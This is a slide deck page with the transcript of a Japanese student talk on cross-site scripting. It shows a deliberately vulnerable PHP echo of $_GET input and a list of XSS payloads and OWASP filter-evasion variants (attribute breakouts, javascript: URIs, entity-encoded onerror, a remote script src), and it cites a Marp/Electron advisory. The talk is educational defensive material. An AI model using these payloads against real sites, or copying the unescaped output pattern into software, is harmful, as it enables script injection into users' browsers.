Upgrade to Pro — share decks privately, control downloads, hide ads and more …

XSSの入力値を調べてみた / searching xss insertion value

Tomoyuki KOYAMA
February 03, 2018
Technology
3
1.4k

XSSの入力値を調べてみた / searching xss insertion value

2018/02/03 学生LT at freee

Tomoyuki KOYAMA

February 03, 2018
Tweet

More Decks by Tomoyuki KOYAMA

See All by Tomoyuki KOYAMA
Reading HTTP Client Hints
tomoyk
0
66
Log message with JSON item count for root cause analysis in microservices
tomoyk
0
170
Distributed Log Search Based on Time Series Access and Service Relations
tomoyk
0
300
Webアプリを動かすまでのインフラ構築 / infra-build-for-web-app
tomoyk
0
390
コンピュータが大好きな私が大学院進学した理由 / Why I chose graduate school
tomoyk
2
840
この先生きのこるための学び方 / how-to-learn-tech
tomoyk
1
360
佐川急便のフィッシングサイトを調べてみた / Analysis of sagawa fishing site
tomoyk
1
160
既存のWebアプリをセキュアにするためにやったこと / Student-LT-WebSec
tomoyk
0
170
パケットを覗いてみよう / Packet workshop for beginners
tomoyk
0
310

Other Decks in Technology

See All in Technology
ソフトウェア開発現代史: なぜ日本のソフトウェア開発は「滝」なのか?製造業の成功体験とのギャップ #jassttokyo
takabow
2
1.5k
ウェブアクセシビリティとは
lycorptech_jp
PRO
0
260
Cloud Native PG 使ってみて気づいたことと最新機能の紹介 - 第52回PostgreSQLアンカンファレンス
seinoyu
1
190
Agile TPIを活用した品質改善事例
tomasagi
0
310
頻繁リリース × 高品質 = 無理ゲー? いや、できます!/20250306 Shoki Hyo
shift_evolve
0
150
DevinはクラウドエンジニアAIになれるのか!? 実践的なガードレール設計/devin-can-become-a-cloud-engineer-ai-practical-guardrail-design
tomoki10
3
1.3k
IAMのマニアックな話 2025​ ~40分バージョン ~​
nrinetcom
PRO
8
910
チームビルディング「脅威モデリング」ワークショップ
koheiyoshikawa
0
140
一人QA時代が終わり、​ QAチームが立ち上がった話​
ma_cho29
0
290
Dapr For Java Developers SouJava 25
salaboy
1
130
大規模アジャイル開発のリアル!コミュニケーション×進捗管理×高品質
findy_eventslides
0
500
Tirez profit de Messenger pour améliorer votre architecture
tucksaun
1
140

Featured

See All Featured
[Rails World 2023 - Day 1 Closing Keynote] - The Magic of Rails
eileencodes
33
2.1k
VelocityConf: Rendering Performance Case Studies
addyosmani
328
24k
The Myth of the Modular Monolith - Day 2 Keynote - Rails World 2024
eileencodes
22
2.6k
What’s in a name? Adding method to the madness
productmarketing
PRO
22
3.4k
10 Git Anti Patterns You Should be Aware of
lemiorhan
PRO
656
60k
Side Projects
sachag
452
42k
Large-scale JavaScript Application Architecture
addyosmani
511
110k
CSS Pre-Processors: Stylus, Less & Sass
bermonpainter
356
30k
Creating an realtime collaboration tool: Agile Flush - .NET Oxford
marcduiker
28
2k
Building a Modern Day 
E-commerce SEO Strategy
aleyda
39
7.2k
Unsuck your backbone
ammeep
670
57k
BBQ
matthewcrist
88
9.5k

Transcript

  1. XSS

  2. B1 Twitter: @tmyk_kym : https://blog.koyama.me/ : Network/Web/Server/Security : PyCon JP,

    Seccamp, etc

  3. XSS (Cross Site Scripting) HTML CWE-79: Improper Neutralization of Input

    During Web Page Generation ('Cross-site Scripting') (3.0)

  4. ... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];

    ?></h1> $_GET['mode'] hello <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1>hello</h1>

  5. ... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];

    ?></h1> $_GET['mode'] <script>alert()</script> <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><script>alert()</script></h1>

  6. XSS Stored XSS( ) Re ected XSS( ) DOM Based

    XSS

  7. XSS == XSS

  8. <script>alert(1)</script> "><script>alert(1)</script> " onmouseover="alert(1) x" onerror="alert(1) <- img src javascript:alert(1)

    <- a href

  9. XSS

  10. ? / . XSS . XSS .

  11. ?

  12. OWASP OWASP XSS 2015 XSS - OWASP https://jpcertcc.github.io/OWASPdocuments/CheatSheets/XSSFilterEvasion.html

  13. ( ) 3

  14. [1] <SCRIPT/XSS SRC="http://example.com/xss.js"> </SCRIPT> / . ... <script xss="" src="http://example.com/xss.js">

    </script>

  15. [2] <<SCRIPT>alert("XSS");//<</SCRIPT> HTML XSS . ... "><script> alert("XSS");//< </script>

  16. [3] <img src=x onerror=&#x6A&#x61&#x76&#x61&#x73 &#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65 &#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> &#x... HTML (16 )

    . ... <img src="x" onerror="javascript:alert('XSS')">

  17. ( )

  18. ( ) <img src=javascript:alert('XSS')> <img src=javascript: alert(String.fromCharCode(88,83,83))> <META HTTP-EQUIV="refresh" CONTENT="3;

    URL=http://;URL=http://yahoo.co.jp/;">
  19. None

  20. Electron Marp Electron Web ... <script>alert()</script> alert ...( )

  21. ?

  22. JVN#21174546: Marp JavaScript https://jvn.jp/jp/JVN21174546/ However, sanitizing inline script should consider

    on future. [Security issue] Remote script can read user local resource · Issue #187 · yhatt/marp “ “

  23. XSS XSS alert() Electron